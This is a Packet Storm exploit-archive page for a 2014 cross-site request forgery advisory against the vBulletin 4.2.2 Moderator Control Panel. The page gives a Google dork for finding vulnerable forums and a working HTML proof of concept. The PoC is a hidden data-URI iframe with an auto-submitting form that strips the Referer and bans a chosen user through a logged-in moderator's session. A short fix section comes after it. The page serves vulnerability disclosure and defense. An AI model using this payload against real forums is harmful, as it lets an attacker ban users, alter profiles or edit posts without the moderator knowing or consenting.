exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

vBulletin Moderator Control Panel 4.2.2 CSRF

vBulletin Moderator Control Panel 4.2.2 CSRF
Posted Dec 17, 2014
Authored by Daniel Tomescu

The moderator control panel in vBulletin version 4.2.2 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | d0093468efc8039f576bacb81ccbe67d21743e722b5f16641951b6e38db926e1

vBulletin Moderator Control Panel 4.2.2 CSRF

Change Mirror Download
# Exploit Title: vBulletin Moderator Control Panel CSRF
# Google Dork: "Powered by vBulletin® Version 4.2.2"
# Date: 16-12-2014
# Exploit Author: Tomescu Daniel http://daniel-tomescu.com https://rstforums.com/forum
# Vendor Homepage: http://www.vbulletin.com/en/vb4-features/
# Software Link: Premium
# Version: vBulletin 4.2.2
# Tested on: Chrome and Firefox
# Reference: https://rstforums.com/forum/88810-csrf-vbulletin-modcp.rst


### 1. Description

vBulletin Moderator Control Panel suffer from a CSRF vulnerability because the CSRF tokens "adminhash" and "securitytoken" are not verified in POST requests.

vBulletin has one additional protection against CSRF: checking the Referer header to be same origin. However this can be bypassed by making a POST request that does not have a Referer header.

This vulnerability allows an attacker to ban/unban users, to modify user profiles, to edit/approve posts and topics and so on.

### 2. Proof of Concept

The attacker should target a moderator of target-forum.com and the moderator must be logged in Moderator Control Panel. The vulnerability can be exploited by tricking the moderator to visit a webpage that contains the following html code:

<iframe name="ifr" frameborder="0" style="overflow:hidden;height:1%;width:1%" height="1%" width="1%"
src='data:text/html,
<html>
<body>
<iframe style="display:none" name="csrf-frame"></iframe>
<form style="display:none" method="POST" action="https://target-forum.com/path-to/modcp/banning.php?do=dobanuser" target="csrf-frame" id="csrf-form">
<input type="hidden" name="do" value="dobanuser" >
<input type="hidden" name="adminhash" value="" >
<input type="hidden" name="securitytoken" value="" >
<input type="hidden" name="username" value="UserToBeBanned" >
<input type="hidden" name="usergroupid" value="8" >
<input type="hidden" name="period" value="D_7" >
<input type="hidden" name="reason" value="Banned with CSRF" >
<input type="submit" value="submit">
</form>
<script> window.onload = function(){ document.getElementById("csrf-form").submit(); } </script>
</body>
</html>'>
</iframe>

As a result, the user with the username "UserToBeBanned" will be added to the banned users list.

### 3. Solution:

Do not allow POST requests without a Referer header.
Verify "adminhash" and "securitytoken" to be valid.

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    0 Files
  • 6
    Sep 6th
    0 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close